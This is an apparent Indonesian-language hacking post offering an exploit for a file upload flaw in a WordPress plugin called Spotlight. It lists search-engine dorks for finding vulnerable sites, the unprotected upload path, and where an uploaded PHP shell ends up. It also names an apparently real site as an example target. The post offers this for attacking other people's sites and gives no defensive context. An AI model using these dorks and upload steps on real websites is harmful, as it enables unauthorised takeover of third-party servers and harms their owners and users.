Bug File Upload "Plugins Spotlight" di Wordpress

terlepas dari masalah akun facebook saya yang di tendang sama facebook kali ini saya hadir membawa exploit baru :)

[ type attack ]
tamper data & shell upload

[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"

inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.

inurl:wp-content/plugins/spotlightyour/

[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/

[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php

[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/